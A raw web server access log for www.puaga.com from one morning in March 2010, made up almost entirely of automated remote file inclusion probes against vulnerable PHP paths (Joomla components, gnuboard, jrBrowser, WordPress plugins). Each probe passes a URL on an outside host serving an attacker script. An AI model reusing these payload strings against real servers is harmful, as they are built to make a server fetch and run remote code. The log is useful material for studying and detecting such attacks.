61.250.93.56 - - [05/Mar/2010:09:40:56 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [05/Mar/2010:09:40:56 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [05/Mar/2010:09:40:56 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [05/Mar/2010:09:40:58 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [05/Mar/2010:09:40:58 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [05/Mar/2010:09:40:58 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [05/Mar/2010:09:41:01 -0800] "GET /logs/access_100211.log%20%20///libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.174.73.50 - - [05/Mar/2010:09:41:04 -0800] "GET /logs/access_100126.log//skin_shop/standard/3_plugin_twindow/errors.php?error=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
222.239.227.209 - - [05/Mar/2010:09:41:17 -0800] "GET /logs/access.log%20%20///libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:09:41:24 -0800] "GET /logs/access_100208.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [05/Mar/2010:09:41:25 -0800] "GET /logs/access_100226.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:09:41:26 -0800] "GET /logs/access_100208.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [05/Mar/2010:09:41:27 -0800] "GET /logs/access_100226.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:09:42:16 -0800] "GET /logs/access_100211.log%20%20///libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:09:42:36 -0800] "GET /logs/access.log%20%20///libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:43:25 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:43:28 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:43:29 -0800] "GET /logs/access_100219.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:43:29 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:43:32 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:43:32 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:43:32 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:43:32 -0800] "GET /logs/access_100219.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:44:08 -0800] "GET /logs/access_100208.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:44:22 -0800] "GET /logs/access_100208.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:09:44:27 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:09:44:27 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:09:44:27 -0800] "GET /logs/access_100222.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:09:45:18 -0800] "GET /logs/access_100225.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:09:45:34 -0800] "GET /logs/access_100218.log/become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:09:45:34 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:09:45:40 -0800] "GET /logs/access_100222.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:45:44 -0800] "GET /logs/access_100217.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [05/Mar/2010:09:45:57 -0800] "GET /logs/access_100220.log//galeria.php?start=0&kategoria=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:45:59 -0800] "GET /logs/access_100217.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [05/Mar/2010:09:46:02 -0800] "GET /logs/access_100226.log//galeria.php?start=0&kategoria=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:46:13 -0800] "GET /logs/access_100222.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:46:13 -0800] "GET /logs/access_100222.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:46:18 -0800] "GET /logs/access_100217.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:46:29 -0800] "GET /logs/access_100222.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:46:49 -0800] "GET /logs/access_100211.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:09:46:51 -0800] "GET /logs/access_100225.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:09:47:00 -0800] "GET /logs/access_100217.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:09:47:02 -0800] "GET /logs/access_100211.log%20%20///libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:09:47:06 -0800] "GET /gnuboard4//bbs/write_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:09:47:07 -0800] "GET /logs/access_100129.log//gnuboard4//bbs/write_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:09:47:07 -0800] "GET /logs//gnuboard4//bbs/write_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:09:47:11 -0800] "GET /logs/access_100202.log//gnuboard4//bbs/write_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:09:47:29 -0800] "GET /logs/access.log%20%20///libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:47:50 -0800] "GET /logs/access_100211.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:09:48:20 -0800] "GET /gnuboard4//bbs/write_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:09:48:21 -0800] "GET /logs//gnuboard4//bbs/write_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:09:48:21 -0800] "GET /logs/access_100129.log//gnuboard4//bbs/write_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:09:48:25 -0800] "GET /logs/access_100202.log//gnuboard4//bbs/write_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:48:30 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:48:30 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:48:30 -0800] "GET /logs/access_100222.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:48:56 -0800] "GET /logs/access_100211.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:49:04 -0800] "GET /logs/access_100211.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:49:08 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:49:08 -0800] "GET /logs/access_100222.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:49:09 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:49:34 -0800] "GET /logs/access_100215.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:49:35 -0800] "GET /logs/access_100222.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:49:35 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:49:35 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:49:53 -0800] "GET /logs/access_100215.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:09:50:31 -0800] "GET /logs/access_100219.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:09:50:37 -0800] "GET /logs/access_100218.log/become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:09:50:37 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:50:58 -0800] "GET /logs/access_100215.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:53:03 -0800] "GET /logs/access_100218.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:53:03 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:53:03 -0800] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:09:53:14 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:53:20 -0800] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:53:20 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:53:20 -0800] "GET /logs/access_100218.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:53:58 -0800] "GET /logs/access_100222.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:53:58 -0800] "GET /logs/access_100217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:09:54:28 -0800] "GET /logs/access_100202.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:09:54:28 -0800] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:54:52 -0800] "GET /logs/access_100222.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:54:52 -0800] "GET /logs/access_100217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:55:38 -0800] "GET /logs/access_100217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:09:55:39 -0800] "GET /logs/access_100222.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:56:45 -0800] "GET /?INCLUDE_FOLDER=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:56:46 -0800] "GET /logs/access_100219.log%20%20/?INCLUDE_FOLDER=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:56:46 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:56:56 -0800] "GET /logs/access_100215.log%20%20/?INCLUDE_FOLDER=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:57:15 -0800] "GET /logs/access_100219.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:09:57:19 -0800] "GET /gnuboard4//bbs/delete_all.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:09:57:19 -0800] "GET /logs//gnuboard4//bbs/delete_all.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:57:20 -0800] "GET /logs/access_100208.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:09:57:23 -0800] "GET /logs/access_100202.log//gnuboard4//bbs/delete_all.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:57:37 -0800] "GET /logs/access_100219.log%20%20/?INCLUDE_FOLDER=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:57:37 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:57:38 -0800] "GET /logs/access_100219.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:57:38 -0800] "GET /?INCLUDE_FOLDER=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:57:43 -0800] "GET /logs/access_100208.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:57:43 -0800] "GET /logs/access_100215.log%20%20/?INCLUDE_FOLDER=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [05/Mar/2010:09:57:43 -0800] "GET /logs/access_100302.log HTTP/1.0" 200 1377884 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:09:58:07 -0800] "GET /logs/access_100219.log//lukkana/index.php?option=com_search&Itemid=5//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST[option]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:09:58:07 -0800] "GET /logs//lukkana/index.php?option=com_search&Itemid=5//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST[option]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:09:58:07 -0800] "GET /lukkana/index.php?option=com_search&Itemid=5//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST[option]=http://golgc.com/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [05/Mar/2010:09:58:54 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php?board_skin_path=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [05/Mar/2010:09:58:54 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [05/Mar/2010:09:58:55 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:09:59:22 -0800] "GET /logs/access_100215.log//lukkana/index.php?option=com_search&Itemid=5//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST[option]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:10:00:06 -0800] "GET /logs/access_100213.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:10:00:06 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:10:00:06 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
